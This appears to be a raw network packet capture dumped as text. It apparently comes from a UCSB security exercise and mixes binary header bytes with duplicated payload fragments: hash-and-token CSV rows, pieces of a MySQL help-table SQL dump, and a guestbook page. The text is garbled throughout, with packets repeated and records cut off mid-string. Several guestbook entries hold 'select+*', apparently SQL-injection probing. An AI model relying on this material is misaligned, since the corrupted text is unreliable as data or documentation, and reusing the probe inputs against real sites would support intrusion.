883A4010DCBC6FEA1172E719608A1359,ucsb,MTNzEwEDA/TEFvtrdLvO+xU0tWmvJIhtH2YpWg==
DEC9B93AE3631C8BA5FE9B990F8414E6,ucsb,MTNzEwEDA/XGAMrszXleherCQOIAht4yCuiacA==
DD9EA85BDF8BB8370B50E8F7C4FDEFA3,ucsb,MTNzEwEDA/ZWYVaQPaU+oRWoFW3MoPU3bBP1kA==
56429B4EF177659F0E6A8B6ED3F64402,ucsb,MTNzEwEDA/fQTTfyeNP4iS81tmp+Ou0KSkgFQA==
C96FD66A53152DFFEB4E8E8E32EF704B,ucsb,MTNzEwEDA/hK34pw1Yjy4rlqOsMHNvX55Nts9w==
479EEC0AE1F3B14F8425154671FF98C5,ucsb,MTNzEwEDA/mgBPH9M89gB4UsMyrU0HuLyuczFA==
9AA8D7FFCB7FE7F5F5E2085DACCAC550,ucsb,MTNzEwEDA/q8hoJjhqFq5PfJj14FwLTlC bbBi0`ET@/,|po0E< D@?  P2?  ~eW1KCvrg==
9DDC3913F4861F86D6141E8A76B60330,ucsb,MTNzEwEDA/trdrHqLAdOk2nDCVsgkHy/k1IH+A==
93A82631E3309F6E13D046E6A2A9E8B1,ucsb,MTNzEwEDA/z296h+uLfpWtJdCXu6Gzmj0rA/qw==
EB0EB17012B7EA26D0F278F6ACB67BB7,ucsb,MTNzEwEDA/0eoHyivj3diEqTB16Ee1xkWtWFZA==
2D8B54D7DF178F92DC19B16CF68F364B,ucsb,MTNzEwEDA/7x7gxN8yCQF3SNd4aYNANuZIvh/w==
0AC51C7E712C142695FF2B56523D20BE,ucsb,MTNzEwEDA//bIydIiznV7OLE8Dit0hwVij/4Qw==
2F48AF48DA7C35DD5CA60356FE8227F6,ucsb,MTNzEwEDBADoW983uPEYO+fTuRSWE/scw10hCg==
3A9A633ACCD44AFCF46C3E6D0F2A0DEC,ucsb,MTNzEwEDBAGT/QA1BORAUHZGLF8dy0eYKa826w==
49B0D323F1E85514D5D8F7E000EFE1A9,ucsb,MTNzEwEDBAKE0w3AiqJ2LgfbxysT7cPHznCq7Q==
FFCEBAB74EB556D836D1315096F2DF41,ucsb,MTNzEwEDBAMdIBW0LFou4qgvWWkDvJiMeP70nA==
AE4EAF4AAD1AB9ED0A7713BB49255D8F,ucsb,MTNzEwEDBATI/8ingeD9koITSsBZUpT47uBDNg==
3B3B23AB6A37ED4CC534466D4C723C0A,ucsb,MTNzEwEDBAVCn0NLk9MlltkQ1hh4nlkDJjWz2A==
2512F27E3B5819D4D585861A8D8314AE,ucsb,MTNzEwEDBAZ8mk1xcZgvjIW/84gZqQZeqd3vQA==
A0EF07C460A5B59C60EF7036EA815AC5,ucsb,MTNzEwEDBAd3gZF4Lphlzgk0p8Fklpf1DfZ8Yw==
5FAF33C7621C2F20A4D97BDF6AF1695C,ucsb,MTNzEwEDBAhhacGo5DfkEyUdwDeZrdjGlbAGXw==
FC6B0ABCCAE959E22654F0CCA04AB5E5,ucsb,MTNzEwEDBAmy2vf2P91/CKoQY4kypPySgxWOdw==
62B0A0F415737CC0D804094C8F7B85C bb0`BiET@/o0AE< D@@  P2?  ~eW1KCvrg==
9DDC3913F4861F86D6141E8A76B60330,ucsb,MTNzEwEDA/trdrHqLAdOk2nDCVsgkHy/k1IH+A==
93A82631E3309F6E13D046E6A2A9E8B1,ucsb,MTNzEwEDA/z296h+uLfpWtJdCXu6Gzmj0rA/qw==
EB0EB17012B7EA26D0F278F6ACB67BB7,ucsb,MTNzEwEDA/0eoHyivj3diEqTB16Ee1xkWtWFZA==
2D8B54D7DF178F92DC19B16CF68F364B,ucsb,MTNzEwEDA/7x7gxN8yCQF3SNd4aYNANuZIvh/w==
0AC51C7E712C142695FF2B56523D20BE,ucsb,MTNzEwEDA//bIydIiznV7OLE8Dit0hwVij/4Qw==
2F48AF48DA7C35DD5CA60356FE8227F6,ucsb,MTNzEwEDBADoW983uPEYO+fTuRSWE/scw10hCg==
3A9A633ACCD44AFCF46C3E6D0F2A0DEC,ucsb,MTNzEwEDBAGT/QA1BORAUHZGLF8dy0eYKa826w==
49B0D323F1E85514D5D8F7E000EFE1A9,ucsb,MTNzEwEDBAKE0w3AiqJ2LgfbxysT7cPHznCq7Q==
FFCEBAB74EB556D836D1315096F2DF41,ucsb,MTNzEwEDBAMdIBW0LFou4qgvWWkDvJiMeP70nA==
AE4EAF4AAD1AB9ED0A7713BB49255D8F,ucsb,MTNzEwEDBATI/8ingeD9koITSsBZUpT47uBDNg==
3B3B23AB6A37ED4CC534466D4C723C0A,ucsb,MTNzEwEDBAVCn0NLk9MlltkQ1hh4nlkDJjWz2A==
2512F27E3B5819D4D585861A8D8314AE,ucsb,MTNzEwEDBAZ8mk1xcZgvjIW/84gZqQZeqd3vQA==
A0EF07C460A5B59C60EF7036EA815AC5,ucsb,MTNzEwEDBAd3gZF4Lphlzgk0p8Fklpf1DfZ8Yw==
5FAF33C7621C2F20A4D97BDF6AF1695C,ucsb,MTNzEwEDBAhhacGo5DfkEyUdwDeZrdjGlbAGXw==
FC6B0ABCCAE959E22654F0CCA04AB5E5,ucsb,MTNzEwEDBAmy2vf2P91/CKoQY4kypPySgxWOdw==
62B0A0F415737CC0D804094C8F7B85C bbBi0`ET@/p܂Ao0E<@?x  3PQtj %  )xtain a lock with a name given by the string str, with a\ntimeout of timeout seconds. Returns 1 if the lock was obtained\nsuccessfully, 0 if the attempt timed out (for example, because another\nclient has previously locked the name), or NULL if an error\noccurred (such as running out of memory or the thread was killed with\nmysqladmin kill). If you have a lock obtained with GET_LOCK(),\nit is released when you execute\nRELEASE_LOCK(), execute a new GET_LOCK(), or your connection\nterminates (either normally or abnormally).\n\nThis function can be used to implement application locks or to\nsimulate record locks. Names are locked on a server-wide basis.\nIf a name has been locked by one client, GET_LOCK() blocks\nany request by another client for a lock with the same name. This\nallows clients that agree on a given lock name to use the name to\nperform cooperative advisory locking.\n','mysql> SELECT GET_LOCK(\'lock1\',10);\n -> 1\nmysql> SELECT IS_FREE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT GET_LOCK(\'lock2\',10);\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock1\');\n -> NULL',''),(90,'UCASE',23,' UCASE(str)\n\nUCASE() is a synonym for UPPER().\n','',''),(91,'MPOLYFROMWKB',13,' MPolyFromWKC ZZBi0`EL@/Ao0E40@?  oP K$T eqŒC ZZBi0`EL@/Ao0E42@?  oP K$Q eqŒC ZZBi0`EL@/܂Sŀo0E4\[@?$ 3 Pu}Ue$ )C/ bb0`BiET@/Ԁo0SE<@@w  3PQtj %  )xtain a lock with a name given by the string str, with a\ntimeout of timeout seconds. Returns 1 if the lock was obtained\nsuccessfully, 0 if the attempt timed out (for example, because another\nclient has previously locked the name), or NULL if an error\noccurred (such as running out of memory or the thread was killed with\nmysqladmin kill). If you have a lock obtained with GET_LOCK(),\nit is released when you execute\nRELEASE_LOCK(), execute a new GET_LOCK(), or your connection\nterminates (either normally or abnormally).\n\nThis function can be used to implement application locks or to\nsimulate record locks. Names are locked on a server-wide basis.\nIf a name has been locked by one client, GET_LOCK() blocks\nany request by another client for a lock with the same name. This\nallows clients that agree on a given lock name to use the name to\nperform cooperative advisory locking.\n','mysql> SELECT GET_LOCK(\'lock1\',10);\n -> 1\nmysql> SELECT IS_FREE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT GET_LOCK(\'lock2\',10);\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock1\');\n -> NULL',''),(90,'UCASE',23,' UCASE(str)\n\nUCASE() is a synonym for UPPER().\n','',''),(91,'MPOLYFROMWKB',13,' MPolyFromWKCB ZZ0`BiEL@/o0a<E40@@  oP K$T eqŒCS ZZ0`BiEL@/o0a<E42@@  oP K$Q eqŒCe ZZ0`BiEL@/go0AE4\[@@$ 3 Pu}Ue$ )C~ ^^Bi0`EP@/#P<o0E8I@?}  Pձ"ӮLU  1U7=xW
Name:
C ^^ʪBiEP@/o0o0oE8I@@ۜ  Pձ"ӮLU  1U7=xW
Name:
Cr bbBi0`ET@/L<o0E The Book

Guestbook

2 : 2
test : test
pr0n : me+likie+pr0n
select+* :
: select+*


Sign my guestbook

Name:
Comment:
Private:


Look up private entry

C bbʪBiET@/o0o0oE The Book

Guestbook

2 : 2
test : test
pr0n : me+likie+pr0n
select+* :
: select+*


Sign my guestbook

Name:
Comment:
Private:


Look up private entry

C ffBiʪEX@/ o0oo0E@?@@ye ձPLU˰9 7=yq1T "#׌C ff0`BiEX@/Ho0<E@?@@xF  ձPLU˰ 7=yq1T "#׌C bbBi0`ET@/,|po0E< E@?  P2?  eX40,ucsb,MTNzEwEDBArH+ScaG977cuONr64ft9TDwKPeXQ==
C1029DBA1ECFC3BE6F1A86F343FD49F0,ucsb,MTNzEwEDBAumRX311HVu6BXCXHW2omKd6flS1Q==
7E267E107EC6CAEFC2E3FC4F0BD4CC8D,ucsb,MTNzEwEDBAx+T90Ok3VzNXjnoJ8FBdC06l53Hg==
554C1E4E5F8DFD52704775EB0CDC802F,ucsb,MTNzEwEDBA1+850obaE2q0s0gc2UesGZdmW4lw==
5366F96B56E3AF50BBC5947B9E9A8632,ucsb,MTNzEwEDBA7wQl0YNwMnYZdwezM50bAv6vcIGA==
9F7962B18B8CADE0C8E85D82768B6342,ucsb,MTNzEwEDBA8a7AJ4yigDzWUXGTpGWakZeLHCdA==
F9EE730D34FF4EA562D4916B02A5EA55,ucsb,MTNzEwEDBBCmmlRhO7ueY78WWszveskqXZSOsQ==
460FFDA4D4A4407CA72F47C3BC99BFF1,ucsb,MTNzEwEDBBFqiAOGqclz92V1BgfYKWmhflHrAw==
C33B43DC0F544612AA9716DD5AD9EEBC,ucsb,MTNzEwEDBBItQUyV+NmqPcqmBN3SMmaJXIJ7ew==
31FAC9D325ADBF9E3748E56076AA3D33,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCrlw==
073856C4DFB82CB9714A258232043395,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCrlw==
0F460E7C6CF4D3DC35D6C4A386269DF9,ucsb,MTNzEwEDAAJoem/drMvuNepZsENE/ErJ6lB63A==
C34B821E60C519B4EC42F2BF32057B19,ucsb,MTNzEwEDAAPKIQF8W6cDHzcGoMkUII9evvqNYg==
348B5561F6C8DB1DEBA4F508D20979FE,ucsb,MTNzEwEDAASRN70K11md4IWMGiT/vCIPDCtRpg==
A53A82BEE7A706BE244DC39F3FF13983,ucsb,MTNzEwEDAAVoE+Pl+yMKWrz6Q25SCEm/2UbAcg==
BB141D11E0B299BC37E06E26A6EB9DEF,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCC bb0`BiET@/o0AE< E@@  P2?  eX40,ucsb,MTNzEwEDBArH+ScaG977cuONr64ft9TDwKPeXQ==
C1029DBA1ECFC3BE6F1A86F343FD49F0,ucsb,MTNzEwEDBAumRX311HVu6BXCXHW2omKd6flS1Q==
7E267E107EC6CAEFC2E3FC4F0BD4CC8D,ucsb,MTNzEwEDBAx+T90Ok3VzNXjnoJ8FBdC06l53Hg==
554C1E4E5F8DFD52704775EB0CDC802F,ucsb,MTNzEwEDBA1+850obaE2q0s0gc2UesGZdmW4lw==
5366F96B56E3AF50BBC5947B9E9A8632,ucsb,MTNzEwEDBA7wQl0YNwMnYZdwezM50bAv6vcIGA==
9F7962B18B8CADE0C8E85D82768B6342,ucsb,MTNzEwEDBA8a7AJ4yigDzWUXGTpGWakZeLHCdA==
F9EE730D34FF4EA562D4916B02A5EA55,ucsb,MTNzEwEDBBCmmlRhO7ueY78WWszveskqXZSOsQ==
460FFDA4D4A4407CA72F47C3BC99BFF1,ucsb,MTNzEwEDBBFqiAOGqclz92V1BgfYKWmhflHrAw==
C33B43DC0F544612AA9716DD5AD9EEBC,ucsb,MTNzEwEDBBItQUyV+NmqPcqmBN3SMmaJXIJ7ew==
31FAC9D325ADBF9E3748E56076AA3D33,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCrlw==
073856C4DFB82CB9714A258232043395,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCrlw==
0F460E7C6CF4D3DC35D6C4A386269DF9,ucsb,MTNzEwEDAAJoem/drMvuNepZsENE/ErJ6lB63A==
C34B821E60C519B4EC42F2BF32057B19,ucsb,MTNzEwEDAAPKIQF8W6cDHzcGoMkUII9evvqNYg==
348B5561F6C8DB1DEBA4F508D20979FE,ucsb,MTNzEwEDAASRN70K11md4IWMGiT/vCIPDCtRpg==
A53A82BEE7A706BE244DC39F3FF13983,ucsb,MTNzEwEDAAVoE+Pl+yMKWrz6Q25SCEm/2UbAcg==
BB141D11E0B299BC37E06E26A6EB9DEF,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCCf bbBi0`ET@/,|po0E< F@?  P2"? C eXrlw==
DD941288D72CE81C55B322FAEDB003D2,ucsb,MTNzEwEDAAJoem/drMvuNepZsENE/ErJ6lB63A==
5BE0239D700E1BF596E631B218DB25F9,ucsb,MTNzEwEDAAPKIQF8W6cDHzcGoMkUII9evvqNYg==
76A2D85D67A20179562DEB6424EE3208,ucsb,MTNzEwEDAASRN70K11md4IWMGiT/vCIPDCtRpg==
628C3EAB54B84B977B12D4A60B9E3FCA,ucsb,MTNzEwEDAAVoE+Pl+yMKWrz6Q25SCEm/2UbAcg==
F6BFFBFF155FA159BD92BB9C23E6270C,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCrlw==
71473E547D1BAFC0B9515D4DFE8FD089,ucsb,MTNzEwEDAAJoem/drMvuNepZsENE/ErJ6lB63A==
DA71D9FE697D113141F17D08E9F3746F,ucsb,MTNzEwEDAAVoE+Pl+yMKWrz6Q25SCEm/2UbAcg==
1A9BE8F609049A6D827FD142A079C560,ucsb,MTNzEwEDABcuMY+9KXx1ecwQJ9YaYMOMMNmyBQ==
6BE46408846E9CC4485569EA64DEED28,ucsb,blah==
A0816A24BCCBCDAE7FD4AE7DAF25E0A4,ucsb,aaaa
9C5C230A7890553A34DDE80351768150,ucsb,aaaa
3B64A81D60C52EDD18E4ED4D2B2EFE65,ucsb,aaaa
29F633655595A2B3B7CC50FE8081E681,ucsb,bbbb
F46A49F3C8E80B97BC91BBCBCACC56FD,ucsb,cccc
93337CB5A83D8B5B72F582E79C7D0C8E,ucsb,cccc
88CC477F088CB6D8993E9C15C7C06B8E,ucsb,cccc
149E89113C556466C245937092807A12,ucsb,cccc
4D886ED63D92883FE373DD7959C21903,ucsb,cccc
F4A95524F2E9E68AEDA14DAE6C5D0CB9,ucsb,cccc
542D7B6362AA7C30CB4B37ACD15721E4,ucsb,cccc
C999F61DD537F593A9D038EBA66E479B,ucsb,cccc
9C bb0`BiET@/o0AE< F@@  P2"? C eXrlw==
DD941288D72CE81C55B322FAEDB003D2,ucsb,MTNzEwEDAAJoem/drMvuNepZsENE/ErJ6lB63A==
5BE0239D700E1BF596E631B218DB25F9,ucsb,MTNzEwEDAAPKIQF8W6cDHzcGoMkUII9evvqNYg==
76A2D85D67A20179562DEB6424EE3208,ucsb,MTNzEwEDAASRN70K11md4IWMGiT/vCIPDCtRpg==
628C3EAB54B84B977B12D4A60B9E3FCA,ucsb,MTNzEwEDAAVoE+Pl+yMKWrz6Q25SCEm/2UbAcg==
F6BFFBFF155FA159BD92BB9C23E6270C,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCrlw==
71473E547D1BAFC0B9515D4DFE8FD089,ucsb,MTNzEwEDAAJoem/drMvuNepZsENE/ErJ6lB63A==
DA71D9FE697D113141F17D08E9F3746F,ucsb,MTNzEwEDAAVoE+Pl+yMKWrz6Q25SCEm/2UbAcg==
1A9BE8F609049A6D827FD142A079C560,ucsb,MTNzEwEDABcuMY+9KXx1ecwQJ9YaYMOMMNmyBQ==
6BE46408846E9CC4485569EA64DEED28,ucsb,blah==
A0816A24BCCBCDAE7FD4AE7DAF25E0A4,ucsb,aaaa
9C5C230A7890553A34DDE80351768150,ucsb,aaaa
3B64A81D60C52EDD18E4ED4D2B2EFE65,ucsb,aaaa
29F633655595A2B3B7CC50FE8081E681,ucsb,bbbb
F46A49F3C8E80B97BC91BBCBCACC56FD,ucsb,cccc
93337CB5A83D8B5B72F582E79C7D0C8E,ucsb,cccc
88CC477F088CB6D8993E9C15C7C06B8E,ucsb,cccc
149E89113C556466C245937092807A12,ucsb,cccc
4D886ED63D92883FE373DD7959C21903,ucsb,cccc
F4A95524F2E9E68AEDA14DAE6C5D0CB9,ucsb,cccc
542D7B6362AA7C30CB4B37ACD15721E4,ucsb,cccc
C999F61DD537F593A9D038EBA66E479B,ucsb,cccc
9C bbBi0`ET@/p܂Ao0E<@?x  3PYtj   )xB(wkb[,srid])\n MultiPolygonFromWKB(wkb[,srid])\nConstructs a MULTIPOLYGON value using its WKB representation and SRID.\n','',''),(92,'DO',6,'DO executes the expressions but doesn\'t return any results. This is\nshorthand for SELECT expr, ..., but has the advantage that it\'s\nslightly faster when you don\'t care about the result.\n\nDO is useful mainly with functions that have side effects, such as\nRELEASE_LOCK().\n','DO expr [, expr] ...',''),(93,'CURTIME',14,' CURTIME()\n\nReturns the current time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT CURTIME();\n -> \'23:50:26\'\nmysql> SELECT CURTIME() + 0;\n -> 235026',''),(94,'BIGINT',1,' BIGINT[(M)] [UNSIGNED] [ZEROFILL]\nA large integer. The signed range is -9223372036854775808 to\n9223372036854775807. The unsigned range is 0 to\n18446744073709551615.\n','',''),(95,'CHAR_LENGTH',23,' CHAR_LENGTH(str)\n\nReturns the length of the string str, measured in characters.\nA multi-byte character counts as a single character.\nThis means that for a string containing five two-byte characters,\nLENGTH() returns 10, whereas CHAR_LENGTH() returns\n5.\n','',''),(96,'SET',6,'SET sets different types of variables that C __Bi0`EQ@/$O<o0E9I@?{  Pձ#׮LU a 1U7=xW0 C bb0`BiET@/Ԁo0SE<@@w  3PYtj   )xB(wkb[,srid])\n MultiPolygonFromWKB(wkb[,srid])\nConstructs a MULTIPOLYGON value using its WKB representation and SRID.\n','',''),(92,'DO',6,'DO executes the expressions but doesn\'t return any results. This is\nshorthand for SELECT expr, ..., but has the advantage that it\'s\nslightly faster when you don\'t care about the result.\n\nDO is useful mainly with functions that have side effects, such as\nRELEASE_LOCK().\n','DO expr [, expr] ...',''),(93,'CURTIME',14,' CURTIME()\n\nReturns the current time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT CURTIME();\n -> \'23:50:26\'\nmysql> SELECT CURTIME() + 0;\n -> 235026',''),(94,'BIGINT',1,' BIGINT[(M)] [UNSIGNED] [ZEROFILL]\nA large integer. The signed range is -9223372036854775808 to\n9223372036854775807. The unsigned range is 0 to\n18446744073709551615.\n','',''),(95,'CHAR_LENGTH',23,' CHAR_LENGTH(str)\n\nReturns the length of the string str, measured in characters.\nA multi-byte character counts as a single character.\nThis means that for a string containing five two-byte characters,\nLENGTH() returns 10, whereas CHAR_LENGTH() returns\n5.\n','',''),(96,'SET',6,'SET sets different types of variables that C __ʪBiEQ@/o0o0oE9I@@ܚ  Pձ#׮LU b 1U7=xW0 CX ZZBiʪEL@/o0oo0E4A@@yo ձPLU#׀  7=yr1UCq ZZ0`BiEL@/To0<E4A@@xP  ձPLU#׀  7=yr1UC ZZBi0`EL@/܂Sŀo0E4\]@?" 3 Pu}Uo${ )C ZZ0`BiEL@/go0AE4\]@@" 3 Pu}Uo${ )CT ZZBiʪEL@/o0oo0E4C@@ym ձPLU#܀  7=yr1UCl ZZ0`BiEL@/To0<E4C@@xN  ձPLU#܀  7=yr1UCF bbBi0`ET@/p܂Ao0E<@?x  3Patj =  )xaffect the operation of the\nserver or your client. It can be used to assign values to user variables or\nsystem variables.\n','SET variable_assignment [, variable_assignment] ...\n\nvariable_assignment:\n user_var_name = expr\n | [GLOBAL | SESSION] system_var_name = expr\n | @@[global. | session.]system_var_name = expr',''),(97,'DATE',1,'A date. The supported range is \'1000-01-01\' to \'9999-12-31\'.\nMySQL displays DATE values in \'YYYY-MM-DD\' format, but\nallows you to assign values to DATE columns using either strings or\nnumbers.\n','',''),(98,'CONV',23,' CONV(N,from_base,to_base)\nConverts numbers between different number bases. Returns a string\nrepresentation of the number N, converted from base from_base\nto base to_base. Returns NULL if any argument is NULL.\nThe argument N is interpreted as an integer, but may be specified as\nan integer or a string. The minimum base is 2 and the maximum base is\n36. If to_base is a negative number, N is regarded as a\nsigned number. Otherwise, N is treated as unsigned. CONV() works\nwith 64-bit precision.\n','mysql> SELECT CONV(\'a\',16,2);\n -> \'1010\'\nmysql> SELECT CONV(\'6E\',18,8);\n -> \'172\'\nmysql> SELECT CONV(-17,10,-18);\n -> \'-H\'\nmysql> SELECT CONV(10+\'10\'+\'10\'Ca bb0`BiET@/Ԁo0SE<@@w  3Patj =  )xaffect the operation of the\nserver or your client. It can be used to assign values to user variables or\nsystem variables.\n','SET variable_assignment [, variable_assignment] ...\n\nvariable_assignment:\n user_var_name = expr\n | [GLOBAL | SESSION] system_var_name = expr\n | @@[global. | session.]system_var_name = expr',''),(97,'DATE',1,'A date. The supported range is \'1000-01-01\' to \'9999-12-31\'.\nMySQL displays DATE values in \'YYYY-MM-DD\' format, but\nallows you to assign values to DATE columns using either strings or\nnumbers.\n','',''),(98,'CONV',23,' CONV(N,from_base,to_base)\nConverts numbers between different number bases. Returns a string\nrepresentation of the number N, converted from base from_base\nto base to_base. Returns NULL if any argument is NULL.\nThe argument N is interpreted as an integer, but may be specified as\nan integer or a string. The minimum base is 2 and the maximum base is\n36. If to_base is a negative number, N is regarded as a\nsigned number. Otherwise, N is treated as unsigned. CONV() works\nwith 64-bit precision.\n','mysql> SELECT CONV(\'a\',16,2);\n -> \'1010\'\nmysql> SELECT CONV(\'6E\',18,8);\n -> \'172\'\nmysql> SELECT CONV(-17,10,-18);\n -> \'-H\'\nmysql> SELECT CONV(10+\'10\'+\'10\'C ZZBi0`EL@/Plo0E4@@?  3P<!p  y)zC ZZ0`BiEL@/܀o0SE4@@@  3P<!p  y)zC- bbBi0`ET@/p܂Ao0E<@?x  3Pitj f  )y+0xa,10,10);\n -> \'40\'',''),(99,'EXTRACT',14,' EXTRACT(type FROM date)\n\nThe EXTRACT() function uses the same kinds of interval type\nspecifiers as DATE_ADD() or DATE_SUB(), but extracts parts\nfrom the date rather than performing date arithmetic.\n','mysql> SELECT EXTRACT(YEAR FROM \'1999-07-02\');\n -> 1999\nmysql> SELECT EXTRACT(YEAR_MONTH FROM \'1999-07-02 01:02:03\');\n -> 199907\nmysql> SELECT EXTRACT(DAY_MINUTE FROM \'1999-07-02 01:02:03\');\n -> 20102\nmysql> SELECT EXTRACT(MICROSECOND\n -> FROM \'2003-01-02 10:30:00.00123\');\n -> 123',''),(100,'ENCRYPT',17,' ENCRYPT(str[,salt])\nEncrypt str using the Unix crypt() system call. The\nsalt argument should be a string with two characters.\n(As of MySQL 3.22.16, salt may be longer than two characters.)\nIf no salt argument is given, a random value is used.\n','mysql> SELECT ENCRYPT(\'hello\');\n -> \'VxuFAJXVARROc\'',''),(101,'OLD_PASSWORD',17,' OLD_PASSWORD(str)\n\nOLD_PASSWORD() is available as of MySQL 4.1, when the implementation of\nPASSWORD() was changed to improve security. OLD_PASSWORD()\nreturns the value of the pre-4.1 implementation of PASSWORD().\n[Password hashing].\n\n PASSWORD(str)\nCalculates and returns a password string from the C7 ZZBiʪEL@/o0oo0E4E@@yk ձPLU#܀  7=ys1UCP bb0`BiET@/Ԁo0SE<@@w  3Pitj f  )y+0xa,10,10);\n -> \'40\'',''),(99,'EXTRACT',14,' EXTRACT(type FROM date)\n\nThe EXTRACT() function uses the same kinds of interval type\nspecifiers as DATE_ADD() or DATE_SUB(), but extracts parts\nfrom the date rather than performing date arithmetic.\n','mysql> SELECT EXTRACT(YEAR FROM \'1999-07-02\');\n -> 1999\nmysql> SELECT EXTRACT(YEAR_MONTH FROM \'1999-07-02 01:02:03\');\n -> 199907\nmysql> SELECT EXTRACT(DAY_MINUTE FROM \'1999-07-02 01:02:03\');\n -> 20102\nmysql> SELECT EXTRACT(MICROSECOND\n -> FROM \'2003-01-02 10:30:00.00123\');\n -> 123',''),(100,'ENCRYPT',17,' ENCRYPT(str[,salt])\nEncrypt str using the Unix crypt() system call. The\nsalt argument should be a string with two characters.\n(As of MySQL 3.22.16, salt may be longer than two characters.)\nIf no salt argument is given, a random value is used.\n','mysql> SELECT ENCRYPT(\'hello\');\n -> \'VxuFAJXVARROc\'',''),(101,'OLD_PASSWORD',17,' OLD_PASSWORD(str)\n\nOLD_PASSWORD() is available as of MySQL 4.1, when the implementation of\nPASSWORD() was changed to improve security. OLD_PASSWORD()\nreturns the value of the pre-4.1 implementation of PASSWORD().\n[Password hashing].\n\n PASSWORD(str)\nCalculates and returns a password string from the Cb ZZ0`BiEL@/To0<E4E@@xL  ձPLU#܀  7=ys1UC ZZBi0`EL@/܂Sŀo0E4\_@? 3 Pu}Uz$h )C ZZ0`BiEL@/go0AE4\_@@ 3 Pu}Uz$h )C bbBi0`ET@/p܂Ao0E<@?x  3P"qtj v  )yplaintext password\nstr, or NULL if the argument was NULL. This is\nthe function that is used for encrypting MySQL passwords for storage\nin the Password column of the user grant table.\n','',''),(102,'FORMAT',21,' FORMAT(X,D)\nFormats the number X to a format like \'#,###,###.##\', rounded\nto D decimals, and returns the result as a string.\nIf D is 0, the result has no\ndecimal point or fractional part.\n','mysql> SELECT FORMAT(12332.123456, 4);\n -> \'12,332.1235\'\nmysql> SELECT FORMAT(12332.1,4);\n -> \'12,332.1000\'\nmysql> SELECT FORMAT(12332.2,0);\n -> \'12,332\'',''),(103,'||',20,' OR\n ||\nLogical OR.\nWhen both operands are non-NULL, the result is 1 if any\noperand is non-zero, and 0 otherwise. With a NULL operand,\nthe result is 1 if the other operand is non-zero, and NULL\notherwise. If both operands are NULL, the result is NULL.\n','mysql> SELECT 1 || 1;\n -> 1\nmysql> SELECT 1 || 0;\n -> 1\nmysql> SELECT 0 || 0;\n -> 0\nmysql> SELECT 0 || NULL;\n -> NULL\nmysql> SELECT 1 || NULL;\n -> 1',''),(104,'CASE',9,' CASE value WHEN [compare-value] THEN result [WHEN [compare-value] THEN result ...] [ELSE result] END\n CASE WHEN [condition] THEN result [WHEN [condition] THEN result ...] [ELSE resuC* bb0`BiET@/Ԁo0SE<@@w  3P"qtj v  )yplaintext password\nstr, or NULL if the argument was NULL. This is\nthe function that is used for encrypting MySQL passwords for storage\nin the Password column of the user grant table.\n','',''),(102,'FORMAT',21,' FORMAT(X,D)\nFormats the number X to a format like \'#,###,###.##\', rounded\nto D decimals, and returns the result as a string.\nIf D is 0, the result has no\ndecimal point or fractional part.\n','mysql> SELECT FORMAT(12332.123456, 4);\n -> \'12,332.1235\'\nmysql> SELECT FORMAT(12332.1,4);\n -> \'12,332.1000\'\nmysql> SELECT FORMAT(12332.2,0);\n -> \'12,332\'',''),(103,'||',20,' OR\n ||\nLogical OR.\nWhen both operands are non-NULL, the result is 1 if any\noperand is non-zero, and 0 otherwise. With a NULL operand,\nthe result is 1 if the other operand is non-zero, and NULL\notherwise. If both operands are NULL, the result is NULL.\n','mysql> SELECT 1 || 1;\n -> 1\nmysql> SELECT 1 || 0;\n -> 1\nmysql> SELECT 0 || 0;\n -> 0\nmysql> SELECT 0 || NULL;\n -> NULL\nmysql> SELECT 1 || NULL;\n -> 1',''),(104,'CASE',9,' CASE value WHEN [compare-value] THEN result [WHEN [compare-value] THEN result ...] [ELSE result] END\n CASE WHEN [condition] THEN result [WHEN [condition] THEN result ...] [ELSE resuCs bbBi0`ET@/p܂Ao0E<@?x  3P'ytj s  )ylt] END\n\nThe first version returns the result where\nvalue=compare-value. The second version returns the\nresult for the first condition that is true. If there was no matching result\nvalue, the result after ELSE is returned, or NULL if there is\nno ELSE part.\n','mysql> SELECT CASE 1 WHEN 1 THEN \'one\'\n -> WHEN 2 THEN \'two\' ELSE \'more\' END;\n -> \'one\'\nmysql> SELECT CASE WHEN 1>0 THEN \'true\' ELSE \'false\' END;\n -> \'true\'\nmysql> SELECT CASE BINARY \'B\'\n -> WHEN \'a\' THEN 1 WHEN \'b\' THEN 2 END;\n -> NULL',''),(105,'BIT_LENGTH',23,' BIT_LENGTH(str)\nReturns the length of the string str in bits.\n','mysql> SELECT BIT_LENGTH(\'text\');\n -> 32',''),(106,'EXTERIORRING',0,' ExteriorRing(poly)\nReturns the exterior ring of the Polygon value poly\nas a LineString.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(ExteriorRing(GeomFromText(@poly)));\n+-------------------------------------------+\n| AsText(ExteriorRing(GeomFromText(@poly))) |\n+-------------------------------------------+\n| LINESTRING(0 0,0 3,3 3,3 0,0 0) |\n+-------------------------------------------+',''),(107,'GEOMFROMWKB',13,' GeomFromWKB(wkb[,srid])\n GeometryFromC bb0`BiET@/Ԁo0SE<@@w  3P'ytj s  )ylt] END\n\nThe first version returns the result where\nvalue=compare-value. The second version returns the\nresult for the first condition that is true. If there was no matching result\nvalue, the result after ELSE is returned, or NULL if there is\nno ELSE part.\n','mysql> SELECT CASE 1 WHEN 1 THEN \'one\'\n -> WHEN 2 THEN \'two\' ELSE \'more\' END;\n -> \'one\'\nmysql> SELECT CASE WHEN 1>0 THEN 